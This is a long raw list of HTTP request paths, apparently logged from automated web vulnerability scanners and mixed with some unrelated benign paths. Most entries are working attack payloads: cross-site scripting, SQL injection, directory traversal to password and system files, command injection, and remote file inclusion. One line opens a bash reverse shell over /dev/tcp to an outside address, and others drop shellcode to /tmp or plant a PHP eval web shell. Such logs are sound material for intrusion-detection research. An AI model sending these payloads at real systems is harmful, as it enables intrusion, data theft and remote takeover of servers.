content=\"testwldz=3506\">\n/cgi-914/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/help.php?q=\";del q49727674 #\n/phpmyadmin//\\..\\..\\..\\..\\..\\..\\..\\..\\windows/win.ini\n/javascript/promoted.exe\n/scripts/hosting/addsubsite.asp\n/j734qobz.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/azcrfs8d.htm?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/examples/jsp/cal/mlog.html?screen=/etc/passwd\n/en-us/9kr0ih0v.idc?<script>document.cookie=\"testzgnm=1183;\"</script>\n/rpxyx07v.cfc?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/help.php?q=\"&rm,q81149724&rem,\n/examples/servlets/servletsearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/0u75ldxq.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/netpad.cgi\n/top.php?stuff=\"\\x0drm q44371957 #\n/zroo33l4.jsp?<script>document.cookie=\"testiklc=904;\"</script>\n/javascript/find.exe\n/j4rdyhw8.asp?<script>document.cookie=\"testrluj=1420;\"</script>\n/zuihld5m.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/fmnveedu.mscgi?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/javascript/tape.exe\n/top.php?stuff=\"|ping\\x09-w\\x098000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/examples/jsp/sessions/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/javascript/backups.exe\n/edition\"/\n/..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/e9rx3ya4.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/169okeyj.cfc?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/fnwhrxyd.kspx?<script>cross_site_scripting.nasl</script>\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>\n//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd\n/forum_arc.asp?n=`/etc/passwd`|36|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;`&#039;.\n/phpmyadmin/language.php?data_dir=/etc/passwd\\x00\n/snowboardingxssmallicon/\n/showmail.pl?folder=<script>alert(document.cookie)</script>\n/aixssh/\n/html/partner.php?mainfile=anything&default_theme='<script>alert(document.cookie);</script>\n/subscriptions.dump\n/cgi-win/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/0w155a7c.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/book review - how to say it when you don't know what to say/\n/cgi-bin/simple/view_page?mv_arg=|cat /etc/passwd|\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/?<script>document.cookie=\"testvowq=604;\"</script>\n/fc9t54l7.x?<script>document.cookie=\"testggad=2000;\"</script>\n/jnv890lt.htm?<script>cross_site_scripting.nasl</script>\n/en-us/account/search.jsp?q=%\"<script>alert(1331905049)</script>\n/scripts/wd7crx47eaml.shtml\n/transcript_tomwelsh050429/\n/main.php?stuff=\"ping,-w,9000,-n,1,4.3.2.1|rem,\n/miz4r5hz.fts?<script>document.cookie=\"testviqu=1270;\"</script>\n/scripts/rvckwz6smkqf.pl\n/uc3w3bdi.x?<script>document.cookie=\"testxllt=9940;\"</script>\n/javascript/mobile.exe\n/scripts/nmap.php?target=|id\n/help.php?q=\"ver\\x0b>q76374652&rem\\x0b\n/examples/jsp/checkbox/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/gvx7m5ti.asp?<script>document.cookie=\"testwldz=3506;\"</script>\n/en-us/i686v90l.asp?<script>document.cookie=\"testfutf=1550;\"</script>\n/en-us/account/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../vtigerservice.php\\x00\n/javascript/7.exe\n/xsqln7eb.php?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/h5sc3gxy.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/gpasswd/\n/webscripts/\n/d5a5renl.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/includes/config.php?relative_script_path=http://xxxxxxx\n/scripts/vzdybnanqpc3.cgi\n/s7qus4g3.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/index.php?chemin=../../../../../../..//etc\n..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini\n/javascript/.passwd.exe\n/scripts/prnnucptkixl.inc\n/javascript/jdbc.exe\n/examples/jsp/cal/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/cgi-win/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/calendar_admin.pl?config=|cat /etc/passwd|\n/3j8echh0.jspa?<script>document.cookie=\"testfuqi=4189;\"</script>\n/examples/jsp/error/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/jnt3f86c.jspa?<script>document.cookie=\"testcmax=9270;\"</script>\n/top.php?stuff=\"&ver\\x0c>q74447142&rem\\x0c\n/examples/servlets/servlet/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/pam-passwdqc_0/\n/uc3w3bdi.cfm?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/j4oqyvga.jsp?<script>cross_site_scripting.nasl</script>\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/mwukuzjaqe.sh+>+/dev/null+&').\"]=1\n/mrating.exe/\n/scripta/\n/javascript/import.exe\n/scripts/index.php?board=nonexistant522491339\n/iv5vkgam.mscgi?<script>document.cookie=\"testfosd=94;\"</script>\n/help.php?q=\"rm,q11574297&rem,\n/scripts/about.php\n/esmozg5d.dll?<script>cross_site_scripting.nasl</script>\n/javascript/footer.exe\n/examples/jsp/colors/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/forum-ra_professionnel.asp?n=../../boot.ini\n/main.php?stuff=\"\\x0drm\\x09q16681283\\x09#\n//.../.../.../.../.../.../.../.../etc/passwd\n/search.asp?term=<\\x00script>alert('vulnerable')</script>\n/cgi-bin/index.php?string='\n/en-us/jnv890lt.asp?<script>cross_site_scripting.nasl</script>\n/dir_thatware/config.php?root_path=http://192.168.202.96:8080/txenjrxf3?'\n/javascript/redir.exe\n/downloads/pafiledb.php?action=email&id=4?\\\"&lt;script&gt;alert('vulnerable')&lt;/script&gt;\\\"\n/en-us/i686v90l.cfc?<script>document.cookie=\"testfutf=1550;\"</script>\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/main.php?logout=\"ping\\x09-w\\x0910000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/x2gyorli.htm?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/vjbrrppi.html?<script>cross_site_scripting.nasl</script>\n/oldscripts/\n/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332010411\n/scripts/content.php?get_action=display_doc&doc_file=credits\n/j4oqyvga.htm?<script>cross_site_scripting.nasl</script>\n/scripts/calendar.php?month=' union select 1,1,'1331904667','calendarix_month_sql_injection.nasl',1 #\n/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332008334','5'--\n/microsoft windows html help control cross-zone scripting vulnerability/\n/scripts/direct.php?rf=/etc/passwd\\x00\n/help.php?q='&rm\\x09q78257168\\x09#\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332009307,416096840 -- \n/javascript/build.exe\n/main.php?stuff=\"ping,-w,7000,-n,1,1.2.3.4&rem,\n/cacti/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/cote' content/\n/main.php?stuff=\"rm q82735586&rem \n/cgi-bin/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/panelitprof'l/\n/examples/servlets/servlet/index.php?cid='\n/shopper.cgi?newpage=../../../../../../etc/passwd\n/javascript/mix.exe\n/pfdispaly.cgi?../../../../../../etc/passwd\n/php/php.exe?c:\\winnt\\win.ini\n/ht8pn8uq.jsp?<script>cross_site_scripting.nasl</script>\n/javascript/commerce.exe\n/p043snfr.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/csv.exe\n/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/scripts/rest/api/2/serverinfo\n/ny1b3qq4.html?<script>cross_site_scripting.nasl</script>\n/vjbrrppi.cfm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/examples/jsp/jsp2/jspx/zpanel.php?page=/etc/passwd\\x00\n/eei78ore.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919009','5'--\n/<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/examples/jsp/checkbox/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/simplebashscripttosetupdevelopmentenvironment/\n/cacti/www/delivery/ac.php?bannerid=-1331909226+or+1=1+--+';passthru(base64_decode($_server[http_nessus_3mwq6imw]));die;/*\n/main.php?logout=\"&ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>\n/officescan/cgi/cgichkmasterpwd.exe\n/examples/servlets/servlet/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/en-us/account/index.php?src=1&_common=1&time=1331905227&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/sdlffngmto0+>+/dev/null+&'); function v\n/j4drbkil.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/index2.exe\n/examples/jsp/checkbox?username=\"<script>foo</script\n/javascript/zencart.exe\n/javascript/support.exe\n/manager/store.php?crn=42'&action=show&show_products_mode=cat_click\n/scripts/sc877q2pzqne.cgi\n/scripts/qcvjnagy16kc.pl\n/m4kkjf8l.cfc?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/bxnyrhmh.kspx?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/ap58k3ci.pl?<script>cross_site_scripting.nasl</script>\n/um7xpn15.cgi?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/g8nu2yy7.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zv8tv7h8.asp?<script>document.cookie=\"testcqwz=9752;\"</script>\n/cgi-perl/sawmill?rfcf+\"sawmillinfo/sawmillpassword\"+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3\n/main.php?logout=;del\\x09q14218261\\x09#\n/examples/jsp/jsp2/jspxsearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/javascript/1.exe\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"vj\\0001j\\0002\\0211\\0341j\\0001jfx\\0133\\0315\\0200\\0222\" >> /tmp/qcywjpzuja0;echo|awstats654145.txt\n/examples/jsp/cal/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/javascript/log4net.exe\n/smg_smxcfg30.exe?vcc=3560121183d3\n/twiki/bin/view/main/twikiusers?rev=75401 `0<&66-;exec 66<>/dev/tcp/192.168.202.118/26121;sh <&66 >&66 2>&66`#\n/top.php?stuff=\"ver&rem\\x09\n/cal_week.php?op=week&catview=999'\n/jscript/\n/8x6w469u.fts?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/top.php?stuff=\"\\x0ddel\\x09q29585118\\x09#\n/um7xpn15.do?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/top.php?stuff='\\x0auname\\x09#\n/scripts/webboard/generate.cgi\n/ewc3rz1l.fts?<script>document.cookie=\"testkgqo=204;\"</script>\n<script>document.cookie=\"testblcp=8120;\"</script>\n/fa8p8lr8.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/index.php?msgs=<script>alert(414575596937)</script>\n/top.php?stuff=ping;-w;8000;-n;1;1.2.3.4&rem;\n/javascript/tmp.exe\n/examples/servlets/servlet/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/en-us/account/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/recordings/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/<?php eval($_post['q71722863']);?>\n/javascript/catalyst.exe\n/help.php?q=\"&ping,-w,8000,-n,1,1.2.3.4&rem,\n/examples/servlets/servlet/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/javascript/.passwd.java\n/main.php?frm_daynight=day&frm_passwd=q74166941&frm_referer=http%3a//192.168.23.202/&frm_user=&scr_height=&scr_width=\n/prescription-vicodin/\n/iktok2bw.html?<script>cross_site_scripting.nasl</script>\n/0u75ldxq.cfc?<script>cross_site_scripting.nasl</script>\n/s7qus4g3.pl?<script>cross_site_scripting.nasl</script>\n/7dbjwpw6.php?<script>cross_site_scripting.nasl</script>\n/1r8cfrlf.dll?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/main.php?stuff=\"ping -w 7000 -n 1 1.2.3.4&rem \n/h5sc3gxy.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/wikka.php?wakka=homepage/../../actions/wikkachanges\n/examples/jsp/jsp2/el/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/ygkjkngd.fts?<script>document.cookie=\"testnago=4518;\"</script>\n/w4996nr0.x?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/en-us/esmozg5d.mscgi?<script>cross_site_scripting.nasl</script>\n/0rufe52p.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ap58k3ci.html?<script>cross_site_scripting.nasl</script>\n/replicas.exe\n/recordings/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/subscription-agreement/\n/main.php?stuff=\\x0auname\\x09>q55874964\\x09#\n/scripts/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/tukodz3j.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/proc.exe\n/1qwv2p5p.fts?<script>document.cookie=\"testvqcy=252;\"</script>\n/eei78ore.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"del q83491369 #\n/include/scripts/export_batch.inc.php?dir=http://192.168.202.96:8080/4dckqcc0acprbz?\n/recordings/index.php?show=/etc/passwd\n/officescan/console/remoteinstallcgi/cgiremoteinstall.exe\n/cgi-bin/download.php?language=/etc/passwd\\x00\n/bl8sefdm.aspx?<script>cross_site_scripting.nasl</script>\n/javascript/paypal.exe\n/bc van 't hul/\n/help.php?q='\\x0auname >q61886362 #\n/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir\n/m2fpztty.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/core/editor.php?editor_insert_bottom=/etc/passwd\n/examples/jsp/sessions/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/phpwebsite/index.php?module=pagemaster&page_user_op=view_page&page_id=10\\\"><script>alert('vulnerable')</script>&mmn_position=[x:x]\n/top.php?stuff=\"&ping -w 8000 -n 1 1.2.3.4&rem \n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3fstuff%3d2040844887&frm_user=&scr_height=&scr_width=q77188379\n/scripts/nquser.php\n/<script>document.cookie=\"testtpby=7052;\"</script>\n/iktok2bw.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgis/cgi-test.exe\n/cacti/index.php?user_langue=../../../../../../../../../../etc/passwd\n/rpxyx07v.php?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331908709')</script>\n/?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/cgi.cgi/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/manager/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/examples/jsp/error/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- \n/j4rdyhw8.aspx?<script>document.cookie=\"testrluj=1420;\"</script>\n/cgi-bin/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/static//..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd\n/javascript/dummy.exe\n/examples/jsp/jsp2/jspx/rot13sj.cgi?/etc/passwd\n/um7xpn15.html?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/..\\pixfir~1\\how_to_login.html\n/src/read_body.php?mailbox=<script>alert(vulnerable)</script>&passed_id=<script>alert(vulnerable)</script>&startmessage=1&show_more=0\n/cgi-bin/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/scripts/acp/index.php\n/help.php?q=\"|ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/javascript/products.exe\n/help.php?q=\"\\x0adel q51358327 #\n/b4vng02k.nsf?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/recordings/print.php?what=article&id='\n/javascript/init.exe\n/health-prescription/\n/ny1b3qq4.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/valentine's-day/\n/entrylevelmedicaltranscriptionjobs/\n/scripts/calendar.php?month=' union select 1,1,'1331904225','calendarix_month_sql_injection.nasl',1 #\n/33y9gcqq.do?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/scripts/tinfo.php?id=1331909289\n/n1afe1y6.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>\n/b1q8bywu.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/eg2u8pbv.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/examples/jsp/jsp2/el/protection.php?action=logout&siteurl=/etc/passwd\n/en-us/account/index.php?id='union/**/select/**/0,0,1431582502,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+ver\n/d5a5renl.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1\n/cacti/store.php?crn=42'&action=show&show_products_mode=cat_click\n/javascript/.passwd.tar.gz\n/examples/jsp/cal/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/ny1b3qq4.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/recorded.exe\n/phonehome_script.exe\n/qhvu0pdg.aspx?<script>document.cookie=\"testchuc=2100;\"</script>\n/javascript/all-wcprops.exe\n/prescriptions/\n/sign.exe\n/snippetmaster/includes/vars.inc.php?_session[script_path]=http://cirt.net/rfiinc.txt??\n/javascript/wicket.exe\n/main.php?stuff=\"rm\\x0cq45919726&rem\\x0c\n/javascript/galleries.exe\n/top.php?stuff=\"uname >q69198385 #\n/cgi-perl/query?mss=../config\n/manual/programs/htpasswd.html\n/l13b77e5.dll?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/scripts/root.exe?/c+dir+c:\\+/og\n/examples/jsp/num/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/subscriptions.css\n/miz4r5hz.pl?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/main.php?logout=\"ver;>q97754931&rem;\n/<script>alert('nessus:tomcat_3_2_2.nasl-1331923741')</script>.jsp\n/5o9zq43e.html?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colorsfaq.php?skin=../../admin/manager&tplpath=admin\n/subscriptions.sql\n/sudoscript/\n/javascript/id.exe\nftp://192.168.25.202/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/cgibin/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/u95h6ymu.php?<script>document.cookie=\"testkhwc=4028;\"</script>\n/top.php?stuff=\"rm\\x09q73669717\\x09#\n/top.php?stuff='del\\x09q68811991\\x09#\n<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/javascript/students.exe\n/cgi-bin/newsscript.pl?mode=admin\n/examples/jsp/cal/whois.cgi?action=load&whois=;id\n/examples/jsp/colors/index.php?page=/etc/passwd\\x00\n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/llumt7msyau5y?\\x00\n/8x6w469u.jsp?<script>document.cookie=\"testgfjr=1286;\"</script>\n/cgi-bin/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/javascript/headers.exe\n/windowsscripting/\n/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/txenjrxf3?'\n/<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/javascript/fcgi.exe\n/javascript/egress.exe\n/o35zot2r.php3?<script>cross_site_scripting.nasl</script>\n/speakers'_corner/\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1332009307,1854936082 --\n/en-us/esmozg5d.aspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/nyvbv05h.jspa?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/javascript/.passwd.o\n/index.php?do=index&dummy=dummy');alert('414036083539');void('\n/j734qobz.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"ping,-w,8000,-n,1,4.3.2.1&rem,\n/javascript/apis.exe\n/ny1b3qq4.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/testingcgiscripts/\n/index.php?action=item&id=\"><script>alert(\"414405594704\");</script>\n/en-us/esmozg5d.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/pxagj7n7.exe?<script>cross_site_scripting.nasl</script>\n/javascript/.htpasswd.sfish/'\"'\"'\"'\"\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+a+fa+>>esbq\n/javascript/phpmyadmin.exe\n/mpcgi/r.cgi?file=../../../../../../../../../../etc/passwd\n/javascript/play.exe\n/j4rdyhw8.exe?<script>document.cookie=\"testrluj=1420;\"</script>\n/subscription_agreement/\n/main.php?logout='del\\x09q59958199\\x09#\n/examples/jsp/jsp2/el/texis.exe/nessus\n/q703m78q.jsp?<script>document.cookie=\"testvowq=604;\"</script>\n/preview.php?php_script_path=http://192.168.202.118:8080/2aibfaczmac8??&cmd=dir\n/scripts/embed/day.php?path=/etc/passwd\\x00\n/../.tar\n/recordings/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/3rdparty/phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd\\x00\n/s7qus4g3.cfc?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/sgdynamo.exe?htname=sgdynamo.exe\n/scripts/rss.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt??\n/o1zj4u9v.htm?<script>document.cookie=\"testabrn=6368;\"</script>\n/javascript/document.mdb\n/manager/download.php?language=/etc/passwd\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+a+1f4+>>esbq\n/0w155a7c.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/remindpasswd\n/de3v2dd9.php?<script>cross_site_scripting.nasl</script>\n/examples/jsp/numsearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332010394')</script>\n/main.php?stuff=\"del q82735586&rem \n/y8pmygrp.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/fcgi-bin/fileseek.cgi?foot=;cat /etc/passwd&head=\n/psynch/nph-psf.exe?css=@rfiurl\n/main.php?stuff=\"\\x0adel q45664393 #\n/scripts/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/fc9t54l7.pl?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/examples/jsp/colors/source?v=../../../../../../../../../../etc/passwd\\x00\n/children's_museums/\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332009308,1,1510172050--\n/9ko6m4c8.nsf?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/cgibin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/rpxyx07v.cfm?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/cgibin/r.cgi?file=../../../../../../../../../../etc/passwd\n/esmozg5d.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>\n/javascript/bigip.exe\n/phpmyadmin/mail.php?id='/**/union/**/select/**/1,2,1331923205,4--&blog=1\n/azcrfs8d.fts?<script>document.cookie=\"testjpdr=9205;\"</script>\n/ht8pn8uq.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/sc877q2pzqne.inc\n/examples/jsp/jsp2/el/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/help.php?q=;uname\\x09>q36511176\\x09#\n/help.php?q=&ver&rem;\n/phpmyadmin/search/show.pl?url=file:/etc/passwd\n/169okeyj.cfm?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/main.php?stuff=\"\\x0drm q98657175 #\n/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>\n/help.php?q=\"rm\\xa0q71425977&rem\\xa0\n/phpmyadmin/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/ygkjkngd.jspa?<script>document.cookie=\"testnago=4518;\"</script>\n/en-us/account/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/33y9gcqq.php3?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/jdx255ea.x?<script>document.cookie=\"testziyq=5055;\"</script>\n/main.php?stuff=\"rm\\xa0q33347165&rem\\xa0\n/javascript/restored.exe\n/scripts/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/j2kdmfw4.dll?<script>cross_site_scripting.nasl</script>\n/j4drbkil.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/readmore.php?config[\"sipssys\"]=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/imprimer.asp?no=/etc/passwd\\x00|44|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/scripts/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/azcrfs8d.exe?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/cgi-bin/common.php?f=0&forumlang=../../../../../../../../../../etc/passwd\n/occam's_razor/\n/bmeun223.cgi?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/scripts/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/vmi8bb12.cfm?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/qhvu0pdg.idc?<script>document.cookie=\"testchuc=2100;\"</script>\n/en-us/oie504mr.aspx?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/ca//\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\windows/\\\\win.ini\n/vwmg565s.idc?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/nslookup.cgi?query=localhost;id&type=any&ns=\n/u95h6ymu.cgi?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n<script>document.cookie=\"testsbvw=6289;\"</script>\n/phpmyadmin/faq.php?action=&type=view&s=&id=-1' union select 0,1385926503,0,0,0,0,0--\n/fcgi-bin/sensepost.exe?/c+dir\n/m4kkjf8l.idc?<script>document.cookie=\"testyglc=8988;\"</script>\n/javascript/.htpasswd.sfish/2147483648\n/scaffoldscript/\n/fa8p8lr8.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/download.php?language=/etc/passwd\\x00\n/scgi-bin/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/help.php?q=\"&uname\\x09>q13543643\\x09#\n/bn857frh.x?<script>cross_site_scripting.nasl</script>\n/6n7aacgg.exe?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/more.php?id=1'\n//<body><script 